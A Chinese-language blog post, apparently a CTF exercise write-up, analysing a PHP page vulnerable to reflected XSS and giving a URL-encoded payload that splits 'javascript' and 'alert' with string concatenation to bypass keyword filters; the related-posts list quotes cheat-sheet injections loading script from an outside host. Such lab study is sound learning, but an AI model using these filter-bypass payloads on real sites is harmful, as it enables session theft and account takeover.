安全-反射性xss基础注入

已于 2023-01-05 12:32:07 修改
阅读量352 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全 xss 前端
于 2022-11-08 21:09:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63069714/article/details/127757363
版权

目录

题目

代码分析

注入过程思路

题目

注:此题与上一次的题目相似,因此直接注入结果。

<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])?$_GET['xss']:'';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) {
    exit('bad');
}
echo "<img src=\"{$xss}\">";
?>

代码分析

1、下面代码是运用了三目运算符对get是否传到参数进行了判断,并将传到的参数对xss变量进行赋值。

$xss = isset($_GET['xss'])?$_GET['xss']:'';

2、下面代码是通过正则表达式,将get上传的参数进行了过滤,将" ( ", " ) ", " & ", " \\ ", " < ", " > ", " ' "这些符号进行了替换,替换结果为空。

$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);

3、条件语句,将(script|document|cookie|eval|setTimeout|alert)这些关键字作为条件语句的条件,只要出现这些关键字的任何一个,就会执行程序退出。

if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) {
    exit('bad');

4、通过get传参,进行打印<img>标签注入的结果。

echo "<img src=\"{$xss}\">";

注入过程思路

 

注入语句:

?xss=1%22%20onerror=location=%22javascri%22%2b%22pt:al%22%2b%22ert%25281%2529

思路:

题目中明确说明不能出现以下关键字(script|document|cookie|eval|setTimeout|alert),因此思路就是就将这些字符串进行拼接,在javascript中拼接字符串可以直接使用+,但是在url地址栏中,+会被url转义为空格,因此需要将+进行urlcode编码。其他原因与上次的题目相同。因此弹窗成功弹出。

努力学IT的小徐
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS跨站脚本攻击
weixin_30505225的博客
04-26 1038
1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身...
XSS跨站攻击,注入代码整理,大全
03-03
XSS跨站攻击,注入代码整理,希望大家支持
XSS漏洞实例
Sumarua的博客
06-19 1181
xss闯关游戏 实战靶场:云演xss漏洞靶场 第一关 直接输出 (1)分析 XSS 测试中一般使用弹窗的方式进行测试。 (2)弹窗代码示例: 此时弹窗回显为1,说明我们输入的指令被成功执行,存在低级的xss漏洞 第二关 value 此时我们再执行这条命令时发现无反应,没有弹窗也没有回显 示例结果 第三关 简单过滤 又叫复写 ,是一种简单的绕过姿势 第四关 简单过滤 当我们输入带有alert的字符时会直接退出脚本执行 javascript中 prompt()方法用于显示一个带有提
XSS注入(跨站脚本攻击)原理与实践
最新发布
打工人的自我修养
04-26 1413
XSS注入是一种最普遍的网站应用程式的安全漏洞攻击,允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。
xss跨站脚本***大全
weixin_34331102的博客
03-20 451
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无...
XSS注入
Dasdwer的博客
04-06 758
介绍:XSS全称为Cross Site Scripting,为了和CSS分开简写为XSS,中文名为跨站脚本。该漏洞发生在用户端,是指在渲染过程中发生了不在预期过程中的JavaScript代码执行。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。反射型XSS:反射型一般通过点击链接来触发举个栗子:代码
xss注入
weixin_45711977的博客
06-29 1851
xss注入
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
利用Express模拟web安全之---xss的攻与防
01-26
存储型XSS相比反射型更具持久性和隐蔽性。 在实际攻击示例中,我们可以看到,攻击者可能会在URL中注入如`(1)">`或`<iframe src="//baidu.com/t.html"><iframe>`这样的代码,利用iframe实现跨域操作,或者通过事件...
Web应用安全:反射型XSS.pptx
06-18
由于这种攻击中的恶意代码不会被存储在服务器上,而是通过用户请求的参数反射回浏览器,因此也被称为非持久性XSS。 **反射型XSS的特点** 1. **非持久性**:恶意脚本不会保存在服务器的数据库中,只存在于用户发起...
Web-安全渗透全套教程XSS跨.zip
05-22
XSS(Cross-Site Scripting,跨站脚本攻击)是其中一种常见的安全漏洞,它允许攻击者通过在网页上注入恶意脚本,进而对用户浏览器进行操控。本套教程聚焦于XSS攻击的原理、检测和防御策略,旨在帮助学习者深入理解这...
Python-XSSFinder用于检测网站中反射的xss工具集
08-10
总之,XSSFinder是Python开发者和安全研究员的有力武器,它简化了反射型XSS漏洞的检测过程,帮助确保网站的安全性。了解并熟练使用这样的工具,对于提高网站安全性、防止恶意攻击至关重要。在日常开发和维护过程中,...
能够发现90%以上XSS漏洞的7个主要的XSS案例。
weixin_42976700的博客
11-04 1758
在阅读有关XSS的材料时,我们通常会看到经典的<script> alert(1)</ script>作为这种漏洞的证明(PoC –概念证明)。尽管确实如此,但它并没有超出此范围,这使得该领域的新手可以寻求更多解决方案来应对现实情况。 因此,这是每个人都应该知道能够利用那里的绝大多数XSS缺陷的7种情况。建立了一个网页来显示它们的变化(单引号或双引号)来进行训练(单击以转到它): 在源代码的开头,有一个HTML注释,其中包含用于触发每种情况的所有参数。它们都适...
XSS漏洞简介、危害与分类及验证
jennycisp的博客
06-27 7822
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
WEB 安全,浅谈 XSS 攻击(附简单实例)
DisMisPres的博客
12-29 2528
为什么说一些网站上的弹出广告(一刀999)不要去点,特别是已经登录过的网站,个人信息的泄露等都很有可能是从这里泄露的。由于XSS这种攻击手法是很常见且基础的方式,目前大多数的web框架都对其做过适配了,我们也不需要太过担心这种安全问题,但是还是要知道有这么回事,并能够有相应的处理方案。现在大多数的项目都是前后端分离的,前后端都要对XSS有所了解,在实际开发中需要多考虑下这类安全问题。
xss漏洞简单案例
weixin_59280309的博客
07-29 2772
xss漏洞简单案例。svg 命名空间
了解xss漏洞的简单案例
weixin_60719780的博客
11-08 1082
特点:仅执行一次,非持久性;参数型跨站脚本主要存在于攻击者将恶意脚本附加到url的参数中,发送给受害者,服务端未经严格过滤处理而输出在用户浏览器,导致浏览器执行代码的数据。攻击过程:​ U经常浏览某个网站A。U使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)在网站A中。H发现A站点包含反射性XSS漏洞,编写一利用漏洞的URL,并将其冒充为来自A的邮件给U。U在登录到A的站点后,浏览H供的URL。
WEB漏洞之XSS注入解析
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-05 993
因此,不建议在URL中使用锚点注入来执行JavaScript代码,而应该使用更安全的方法,如在HTML文档中嵌入JavaScript代码或在外部JavaScript文件中编写代码。所以:document.location.href.indexOf("default=") 的作用就是检索:default= 第一次出现的位置,如果检索的字符串值没有出现,则该方法返回 -1 ,(没有是:=== -1;如果浏览器支持锚点注入,那么在URL的井号后面添加JavaScript脚本是可以运行的。
Web安全测试入门:XSS注入漏洞解析
在介绍Web安全测试时,首先需要理解的是安全体系,它包括了安全测试的内容和方法,如XSS跨站脚本攻击、注入漏洞、权限越权、文件上传下载的安全性、CSRF跨站请求伪造、Cookie安全性、登录安全、敏感信息泄露、日志...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

努力学IT的小徐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值